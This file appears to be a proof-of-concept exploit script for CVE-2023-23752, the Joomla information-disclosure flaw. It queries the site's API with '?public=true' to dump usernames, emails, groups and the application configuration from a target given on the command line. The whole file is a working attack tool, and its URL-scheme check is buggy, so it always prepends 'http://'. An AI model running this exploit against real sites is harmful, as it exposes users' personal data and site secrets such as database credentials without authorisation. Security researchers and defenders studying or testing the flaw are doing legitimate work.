PoCs/CVE-2023-23752/CVE-2023-23752.py

import requests
import json
import argparse

class User:
    def __init__(user, name, email, lastvisitDate, groupNames):
        user.name = name
        user.email = email
        user.lastvisitDate = lastvisitDate
        user.groupNames = groupNames
    
    def __str__(user):
        return f"Username: {user.name}\nEmail: {user.email}\nLast Visit: {user.lastvisitDate}\nGroups: {user.groupNames}"

def vulnCheck(tgt):
    verUrl = tgt + "/administrator/manifests/files/joomla.xml"
    verData = requests.get(verUrl)
    if len(verData.text) == 0 or "404" in verData.text.lower() or "403" in verData.text.lower():
        print("[-] Site does not appear to be vulnerable!")
        raise SystemExit

def getUsers(tgt):
    usrUrl = tgt + "/api/index.php/v1/users?public=true"
    usrData = requests.get(usrUrl)
    if "404" in usrData.text.lower() or "403" in usrData.text.lower():
        print("[-] Error fetching user data, site may not be vulnerable")
        raise SystemExit
    parsedUsrs = json.loads(usrData.text)
    return parsedUsrs

def parseUsers(usrData):
    users = []
    for user in usrData["data"]:
        userAtribs = user["attributes"]
        newUser = User(userAtribs["username"],
                       userAtribs["email"],
                       userAtribs["lastvisitDate"],
                       userAtribs["group_names"] )
        users.append(newUser)
    return users

def getConfig(tgt):
    cfgUrl = tgt + "/api/index.php/v1/config/application?public=true"
    cfgData = requests.get(cfgUrl)
    if "404" in cfgData.text.lower() or "403" in cfgData.text.lower():
        print("[-] Error fetching user data, site may not be vulnerable")
        raise SystemExit
    parsedCfg = json.loads(cfgData.text)
    return parsedCfg

    

if __name__ == "__main__":
    parser = argparse.ArgumentParser(prog='Joomla Info Disclosure CVE-2023-23752', description='This is a PoC for CVE-2023-23752, an information disclosure vulnerability in Joomla < 4.2.8', epilog='Written by 0xVoodo')
    parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
    args = parser.parse_args()

    tgt = args.target.lower()

    if tgt[4] != "http" and tgt[5] != "https":
        print("[*] No URL schema specified, defaulting to HTTP")
        tgt = "http://" + tgt

    vulnCheck(tgt)

    print(f"\n[+] User data found!") 
    print("----------")
    for user in parseUsers(getUsers(tgt)):
        print(user)
        print("----------")
    
    print(f"\n[+] Config data found!")
    print("----------")
    for i in getConfig(tgt)["data"]:
        print(i["attributes"])